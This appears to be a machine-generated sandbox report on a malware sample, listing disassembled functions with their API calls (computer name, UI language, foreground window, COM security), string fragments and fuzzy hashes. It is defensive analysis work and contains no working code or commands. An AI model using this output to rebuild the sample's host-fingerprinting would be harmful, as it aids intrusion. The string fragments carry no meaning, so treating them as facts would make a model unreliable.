Function 00428750 Relevance: 4.1, Strings: 3, Instructions: 328
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

&76#, xrefs: 00428A72
BDE:, xrefs: 004287C2, 004287F2
/X, xrefs: 00428A82

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: InitializeThunk
String ID: &76#$/X$BDE:
API String ID: 2994545307-3468712750
Opcode ID: bda00dd6b24e91b95935bd233f1bfdad870dd724f28d61ad92188f97a0c207be
Instruction ID: de511f14106650819994a34559177bbffe3ae858db635c904efe7b47fdd347f8
Opcode Fuzzy Hash: bda00dd6b24e91b95935bd233f1bfdad870dd724f28d61ad92188f97a0c207be
Instruction Fuzzy Hash: 4C9146B27093119BD3109F25EC8176FB6D2EBC5318F58813EE4858B381EA3C9846878B

Function 00430F54 Relevance: 3.1, APIs: 2, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 00430F85
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0043104A

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: d64d061adfdbf120dee82a0fc1018915ebc31be6462cf1f122b0efd75b845ce0
Instruction ID: 7b7113e42e32beabe8c4c016577568230ad12c23f9774a4b5fe118adb1295c8a
Opcode Fuzzy Hash: d64d061adfdbf120dee82a0fc1018915ebc31be6462cf1f122b0efd75b845ce0
Instruction Fuzzy Hash: 9531F33691C3D08BE3348F359C553EBBBE2ABC6314F19866DC8D857285DB7A1805CB86

Function 00430F4E Relevance: 3.1, APIs: 2, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 00430F85
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0043104A

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: d43ff3280345835f4c21c516bd395dd340a58cd7044fd3e67ca854e034ba4060
Instruction ID: fb4d1f38de1a85f36896b77157d4be4448694684cc70b9096da98958b1763f09
Opcode Fuzzy Hash: d43ff3280345835f4c21c516bd395dd340a58cd7044fd3e67ca854e034ba4060
Instruction Fuzzy Hash: D931F23695C3908BE3348F359C953DBBBE2ABC6314F19862DC8D817284DB7A1805CB86

Function 00415D89 Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
Instruction ID: fe71d1bcebcc68b075db47888e1e2cba677fa4d5c187ad294acff22be9a80e62
Opcode Fuzzy Hash: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
Instruction Fuzzy Hash: 1B51B9B16086428FC714CF58C4917ABF7E2ABD5304F18892EE4EA87342E739DD45CB86

Function 00430F03 Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0043104A

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: b124762bb82201bc91150ff6a1fbec5ae2415c41406e4d3524ac183859c93793
Instruction ID: 4d6f8d4a3a0c9291bd82fbf102df9c74bb0e146b1c020dae9dd1e6f681f2a276
Opcode Fuzzy Hash: b124762bb82201bc91150ff6a1fbec5ae2415c41406e4d3524ac183859c93793
Instruction Fuzzy Hash: D921E1369583A04BE3348F359C913DBBBE2ABC6314F09872DC8D817285DB7A1805CBC6

Function 00444C20 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

Y\]R, xrefs: 00444E24

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: InitializeThunk
String ID: Y\]R
API String ID: 2994545307-2023185185
Opcode ID: e368f69b4051d92f4704c4a144e7348ede97506515b2c153191350598cb49a47
Instruction ID: 32cb53c941d059e59dbce30d87d00b37379897002de2ab33e1c58f8979392959
Opcode Fuzzy Hash: e368f69b4051d92f4704c4a144e7348ede97506515b2c153191350598cb49a47
Instruction Fuzzy Hash: 6E910371A087118BE314CF29D89076BF7E2FBC5314F18862DE89597391DB79DC0A8786

Function 00442080 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0044523A,?,00000018,?,?,00000018,?,?,?), ref: 004420AE

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 004442E0 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dacedb78e00f7b3ea06162b8a930dfcecaa1b39c86591f60bbd6e03e633e71ac
Instruction ID: 5aabee4b8b26e2ec9a193049fa608abe716db33e51fa934c25155f6b19f8c581
Opcode Fuzzy Hash: dacedb78e00f7b3ea06162b8a930dfcecaa1b39c86591f60bbd6e03e633e71ac
Instruction Fuzzy Hash: AC9115316083018BEB14DF29D86072FB7E2FFC9724F15892DE9C597390D73898158B8A

Function 0042F4E1 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e23383d503dd4dbdf91b2871d6f5546dc280df0b90b4798c3f127ca15e464351
Instruction ID: 9ecb6df6af24b1f74966394131ffdcc5ba7ea28be31435c304ffc82d0aba2bdf
Opcode Fuzzy Hash: e23383d503dd4dbdf91b2871d6f5546dc280df0b90b4798c3f127ca15e464351
Instruction Fuzzy Hash: 43519D22B457624BD7048A3898802A6BBA3DFD6361F9CC73FC491873D6DB7C980AC345

Function 0043CE90 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43fca39a7f72a1f4448c48acaadee8de276498a9144bd6424f4a2099b91a712c
Instruction ID: e35f2f60d65f04bb18af1f8d7cf5bd4ec7f66c51464b3c3842bee00e328901c8
Opcode Fuzzy Hash: 43fca39a7f72a1f4448c48acaadee8de276498a9144bd6424f4a2099b91a712c
Instruction Fuzzy Hash: 3B51F671A0C6018FD3188B28D59032BB7E2BBC9328F159B2FE4A5573D1D279C946CB4B

Function 00441B50 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
Instruction ID: 01036c0abe53894f00a23a0b33865d1644de07ddd8768e0b6d49d0c725de61cd
Opcode Fuzzy Hash: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
Instruction Fuzzy Hash: 0F4100BA4583028BD314CF51D89035BFAE3ABC5308F19CA2DE4C95B344DAB9C5098B96

Function 00441816 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
Instruction ID: d294dc39abdefed7299eeb113bd94dd65164e84cb7974bfe8d228d73c8c27ee3
Opcode Fuzzy Hash: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
Instruction Fuzzy Hash: 1911D0792593018BD308CF55DC9136BFBE3ABC6348F19C92DE18557355CAB8C106CB5A

Function 004423C5 Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 004423C5
GetForegroundWindow.USER32 ref: 004423E0

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
Instruction ID: 3f5cde6939bccaa2b971e6e0c262a6c41a2af89a1d69f81b939c4d59ebd80ce7
Opcode Fuzzy Hash: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
Instruction Fuzzy Hash: D3D0A7BDD114104BB2559720BC0E45F36119B9B20A304443CE4070121BEA35118E868E

Function 00436312 Relevance: 1.7, APIs: 1, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 004363C4

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: ef8483e8ab778255dd258931c3d82cf31cc5b03f09e4434ba3215fbb1080e3d0
Instruction ID: 95046018421402d0801aebd9565f509305716e141edef8233f74c498256fed45
Opcode Fuzzy Hash: ef8483e8ab778255dd258931c3d82cf31cc5b03f09e4434ba3215fbb1080e3d0
Instruction Fuzzy Hash: 8F811A20108FC2CED332867C8948747BFD15B27228F484B9DD5E64BBD2D2AAB509C766

Function 0042F222 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,D3BAB492,00000100), ref: 0042F301

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 5f99d4ff4f8377a95cea722d27edd5ab8b31f14781de5b973d5a456a3fa85f19
Instruction ID: 2bea6ffdc9a5f01b0fb38135ff7c329ec52023607b2de6582bc56e9ec8f1d5ec
Opcode Fuzzy Hash: 5f99d4ff4f8377a95cea722d27edd5ab8b31f14781de5b973d5a456a3fa85f19
Instruction Fuzzy Hash: 5A218E3460D3D28BD774CF25D4987EBB7E0AB86304F54896DC4D987281CA75580ACB96

Function 0043B967 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 0043B996

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 98e9cfe35c1bf7e059ea3f603ca1750e6c53937badd962860f9777bb0233e5b3
Instruction ID: 791500818c7a1469a8ddc9d1224b017d77911d2958c513979461ec400309f230
Opcode Fuzzy Hash: 98e9cfe35c1bf7e059ea3f603ca1750e6c53937badd962860f9777bb0233e5b3
Instruction Fuzzy Hash: 4B219F71A046418FD714CF38C994B99BBF1AB5A310F0982D9D1A5DB3E2D7388D408F51

Function 00442020 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0040BC80,00000000,00000000), ref: 00442052

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ea8428d80ce760913c6091ce044fd24d24df86904107ae5a33981043699a0a50
Instruction ID: ce4dc6f8cea40f70218e043c946db7baefed7d7f927e290f9bf4e18e7a102a01
Opcode Fuzzy Hash: ea8428d80ce760913c6091ce044fd24d24df86904107ae5a33981043699a0a50
Instruction Fuzzy Hash: 95E02B72514210ABF2101F387C05B1736749FC2715F054436F601A3111D739E811C19E

Function 00437180 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004371C9

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 1eee05ed824ab0fad7e0fec43f832c4afae3966b95aa27efb02f9f36988d2f71
Instruction ID: 81660e69c17f0543e92a0099c1eb05d4904c421e706bb06363d2a5bfa495106c
Opcode Fuzzy Hash: 1eee05ed824ab0fad7e0fec43f832c4afae3966b95aa27efb02f9f36988d2f71
Instruction Fuzzy Hash: B9F0B7742497028FD355DF68C5A471BBBE0EF49304F01882CE5A68B290CBB5A948CF82

Function 00434865 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004348AD

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 53b3cb3652385e22ea377a8ab379108a4fc6dc91706275fd2e50ee136dcc3ceb
Instruction ID: d7c258c8275f3fac7a4ea29dfb35da0c5007ac1f08ebe8bc9e26289c7763600b
Opcode Fuzzy Hash: 53b3cb3652385e22ea377a8ab379108a4fc6dc91706275fd2e50ee136dcc3ceb
Instruction Fuzzy Hash: C5F0A5B02087028FE310DF25C5A974FBBE5BB81348F11890DE5A54B291C7FA96898FC6

Function 0040D400 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D413

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
Instruction ID: 5b8c1c1c38bc235c753b9088e917c06d101502a7d4806eff28edba5b46e46085
Opcode Fuzzy Hash: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
Instruction Fuzzy Hash: 32D05E7565014477D2146B18EC47F563658970375AF000229F663C65D1D910A915E569

Function 0040D433 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D445

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
Instruction ID: f87055a7ed73e73a39e7b0bf2bc1a884afc0d8708234b3b1202e7b1dbc502a37
Opcode Fuzzy Hash: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
Instruction Fuzzy Hash: 52D0C9787D8305B7F6685B18EC17F1632505306F61F340229B366FF6D0C9D07901961C

Function 004404E2 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 004404FD

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
Instruction ID: e6622cb3e0fd9e941ff1a23b217b6006838c210e8ccdd082eec4ddb73310e109
Opcode Fuzzy Hash: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
Instruction Fuzzy Hash: 4AC08C31504922EBC7102F28BC16BC63A14EF02762F0748B1F000A90B5C728EC91C9D8

Function 004404B0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,00000001,00408C27,FDFCE302), ref: 004404C0

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
Instruction ID: a3e7d273c8645b615fb13e0d68042f64d6ea605513032f2b713a79b74872f641
Opcode Fuzzy Hash: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
Instruction Fuzzy Hash: CFC04871045220ABDA502B25EC09BCA3A68AF46662F0280A6B044A70B2C760AC82CA98

Non-executed Functions

Function 004127E0 Relevance: 183.9, APIs: 3, Strings: 101, Instructions: 1937COMMON

Download Yara Rule

Strings

q, xrefs: 00413284
J, xrefs: 0041359E
=, xrefs: 0041299B
m, xrefs: 00413E7D
y, xrefs: 00413E1D
$, xrefs: 00413756
$, xrefs: 0041340E
&, xrefs: 00413746
T, xrefs: 00413138
L, xrefs: 0041414A
W, xrefs: 00413322
@, xrefs: 00413580
,, xrefs: 00413716
z, xrefs: 00412FBA
:, xrefs: 00414212
1, xrefs: 00413B52
t, xrefs: 00413EB5
F, xrefs: 0041417A
0, xrefs: 0041332A
E, xrefs: 00412FB2
w, xrefs: 00413D1A
L, xrefs: 0041328E
, xrefs: 00413736
^, xrefs: 004140BA
+, xrefs: 00413406
:, xrefs: 00413B0C
6, xrefs: 00413B20
p, xrefs: 00413D1F
v, xrefs: 00413188
R, xrefs: 00413E2D
p, xrefs: 00413ED5
D, xrefs: 0041436D
Q, xrefs: 00412921
x, xrefs: 00413F15
S, xrefs: 00413289
z, xrefs: 00413F05
0, xrefs: 00413B4A
~, xrefs: 00413EE5
', xrefs: 0041374E
N, xrefs: 0041358A
P, xrefs: 0041412A
]ZN, xrefs: 004142B8
f, xrefs: 00413F25
", xrefs: 0041358F
<, xrefs: 00413B02
]ZN, xrefs: 004142C8
b, xrefs: 00413F45
8, xrefs: 00413B16
', xrefs: 00412C44
f, xrefs: 00413168
L, xrefs: 00413594
6, xrefs: 0041333A
*, xrefs: 00413D85
D, xrefs: 00412FAA
1, xrefs: 00413332
q, xrefs: 00413D24
., xrefs: 00413B5A
`, xrefs: 00413810
|, xrefs: 00413EF5
N, xrefs: 00412E53
X, xrefs: 004140EA
]ZN, xrefs: 004142B1
Z, xrefs: 004140DA
r, xrefs: 00413EC5
H, xrefs: 0041416A
!, xrefs: 004141C2
$, xrefs: 004139A3
@, xrefs: 004141AA
T, xrefs: 0041410A
", xrefs: 00413726
D, xrefs: 0041418A
+, xrefs: 004141E2
., xrefs: 0041357B
d, xrefs: 00413F35
e, xrefs: 00413F3D
9, xrefs: 00413585
J, xrefs: 0041415A
N, xrefs: 0041413A
4, xrefs: 00413B2A
-, xrefs: 00414152
3, xrefs: 00412ADE
v, xrefs: 00413EA5
>, xrefs: 00413AF8
a, xrefs: 00413158
8, xrefs: 00414202
R, xrefs: 0041411A
(, xrefs: 00413D95
A, xrefs: 00412B95
2, xrefs: 00413B3A
(, xrefs: 00413EFD
D, xrefs: 004145EE
B, xrefs: 00413576
w, xrefs: 00413571
M, xrefs: 00413599
V, xrefs: 004140FA
6, xrefs: 004133FE
!, xrefs: 004141B2
4, xrefs: 004141D2
B, xrefs: 0041419A
\, xrefs: 004140CA
%, xrefs: 00413416

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: $ ]ZN$ ]ZN$ ]ZN$!$!$"$"$$$$$$$%$&$'$'$($($*$+$+$,$-$.$.$0$0$1$1$2$3$4$4$6$6$6$8$8$9$:$:$<$=$>$@$@$A$B$B$D$D$D$D$E$F$H$J$J$L$L$L$M$N$N$N$P$Q$R$R$S$T$T$V$W$X$Z$\$^$`$a$b$d$e$f$f$m$p$p$q$q$r$t$v$v$w$w$x$y$z$z$|$~
API String ID: 0-299570860
Opcode ID: f5b952a7fa576cf3fac9bc8395e035e8ba89dd158049201593eea142aec36e13
Instruction ID: 11c8b48c8f4a98f758d37e8cd5808665052ec381988852a9cf89f45dba9536ca
Opcode Fuzzy Hash: f5b952a7fa576cf3fac9bc8395e035e8ba89dd158049201593eea142aec36e13
Instruction Fuzzy Hash: CF03B07010C7C08AD3259B38C5883EFBFD1AB96314F188A6EE5E9873D2D7798585871B

Function 0041DE90 Relevance: 123.7, Strings: 98, Instructions: 1234COMMON

Download Yara Rule

Strings

i, xrefs: 0041EBB9
C, xrefs: 0041E3DD
Z, xrefs: 0041E3F6
L, xrefs: 0041E414
&, xrefs: 0041E1EA
., xrefs: 0041E148
4, xrefs: 0041E1E2
F, xrefs: 0041EB96
I, xrefs: 0041E573
[, xrefs: 0041EB87
?, xrefs: 0041E5FB
L, xrefs: 0041E3C9
q, xrefs: 0041F042
N, xrefs: 0041E400
p, xrefs: 0041E428
t, xrefs: 0041E43C
g, xrefs: 0041E383
*, xrefs: 0041E140
S, xrefs: 0041E3C4
p, xrefs: 0041E50B
G, xrefs: 0041E5C3
g, xrefs: 0041EBA5
k, xrefs: 0041EBAA
9, xrefs: 0041E5BB
E, xrefs: 0041EB91
J, xrefs: 0041E3E7
g, xrefs: 0041E543
b, xrefs: 0041E46E
e, xrefs: 0041EBA0
\, xrefs: 0041E128
?, xrefs: 0041E5F3
L, xrefs: 0041E40F
k, xrefs: 0041E4BB
S, xrefs: 0041E48B
k, xrefs: 0041E60B
U, xrefs: 0041E473
Z, xrefs: 0041E3A6
c, xrefs: 0041E437
H, xrefs: 0041E3E2
D, xrefs: 0041E3FB
V, xrefs: 0041E39C
R, xrefs: 0041E40A
>, xrefs: 0041E432
|, xrefs: 0041E158
s, xrefs: 0041E108
u, xrefs: 0041E455
i, xrefs: 0041EBB4
G, xrefs: 0041F03A
u, xrefs: 0041E118
(, xrefs: 0041E379
|, xrefs: 0041E405
S, xrefs: 0041E3BF
c, xrefs: 0041E503
L, xrefs: 0041E45F
~, xrefs: 0041E100
4, xrefs: 0041E464
6, xrefs: 0041E5EB
t, xrefs: 0041E1FA
q, xrefs: 0041E3D8
~, xrefs: 0041E45A
Q, xrefs: 0041E3A1
h, xrefs: 0041E446
h, xrefs: 0041E3AB
(, xrefs: 0041E4E3
c, xrefs: 0041E423
z, xrefs: 0041E450
B, xrefs: 0041E3CE
D, xrefs: 0041EB8C
{, xrefs: 0041E4EB
{, xrefs: 0041EBAF
d, xrefs: 0041EB9B
x, xrefs: 0041E441
d, xrefs: 0041E392
y, xrefs: 0041E613
!, xrefs: 0041E4D3
X, xrefs: 0041E120
`, xrefs: 0041E53B
}, xrefs: 0041E110
v, xrefs: 0041E513
F, xrefs: 0041E61B
:, xrefs: 0041E483
<, xrefs: 0041E3BA
T, xrefs: 0041E38D
C, xrefs: 0041E3D3
w, xrefs: 0041E44B
l, xrefs: 0041E0D8
u, xrefs: 0041E42D
o, xrefs: 0041EBBE
P, xrefs: 0041E388
], xrefs: 0041E160
[, xrefs: 0041E397
/, xrefs: 0041E533
L, xrefs: 0041E603
7, xrefs: 0041E1DA
?, xrefs: 0041E5DB
?, xrefs: 0041E3EC
{, xrefs: 0041E52B
', xrefs: 0041E138

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: !$&$'$($($*$.$/$4$4$6$7$9$:$<$>$?$?$?$?$B$C$C$D$D$E$F$F$G$G$H$I$J$L$L$L$L$L$N$P$Q$R$S$S$S$T$U$V$X$Z$Z$[$[$\$]$`$b$c$c$c$d$d$e$g$g$g$h$h$i$i$k$k$k$l$o$p$p$q$q$s$t$t$u$u$u$v$w$x$y$z${${${$|$|$}$~$~
API String ID: 0-1873956536
Opcode ID: fc18553a73c8fd4dc2fea3a9f9035c4283c881730360b760b769bf46582e99ae
Instruction ID: 931559f782a0dae5da6d3a2348cda9da3af0ea84656c223040a8e2c7efec153d
Opcode Fuzzy Hash: fc18553a73c8fd4dc2fea3a9f9035c4283c881730360b760b769bf46582e99ae
Instruction Fuzzy Hash: DAB28F3160C7C08BD325DA38C85439FBBD1ABD6324F184A6DE8E98B3C2D6799849C757

Function 0042621B Relevance: 33.7, Strings: 26, Instructions: 1202COMMON

Download Yara Rule

Strings

s@qF, xrefs: 0042700F
F;D, xrefs: 00426431
zx, xrefs: 00426426
(]2_, xrefs: 00426A7B
2{<u, xrefs: 00426E06
2U/W, xrefs: 00426A91
bxB, xrefs: 00427850
'Y<[, xrefs: 00426A70
7J0H, xrefs: 00426452
6fd, xrefs: 00426846
N>_<, xrefs: 00426560
wDuJ, xrefs: 004270A8
Ta\c, xrefs: 00426AB2
jh, xrefs: 00426647
qVol, xrefs: 004272F5, 0042730C, 004273DA, 004273EA
SP, xrefs: 004270C9
:vt, xrefs: 00426872
Z[, xrefs: 00426E5E
Teg, xrefs: 00426ABD
{HyN, xrefs: 004270B3
7w, xrefs: 00426E11
3416, xrefs: 004275C5
zx, xrefs: 0042661B
3416, xrefs: 004273A5
Vt%t, xrefs: 00426E81
nl, xrefs: 0042663C

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: F;D$zx$'Y<[$(]2_$2U/W$2{<u$3416$3416$6fd$7J0H$7w$:vt$N>_<$SP$Ta\c$Teg$Vt%t$Z[$bxB$qVol$s@qF$wDuJ${HyN$jh$nl$zx
API String ID: 0-2025997952
Opcode ID: d34ec39eb96bb7efa42d43d0cecc10ce8a4047bc9737a28ca6cdc305126fa738
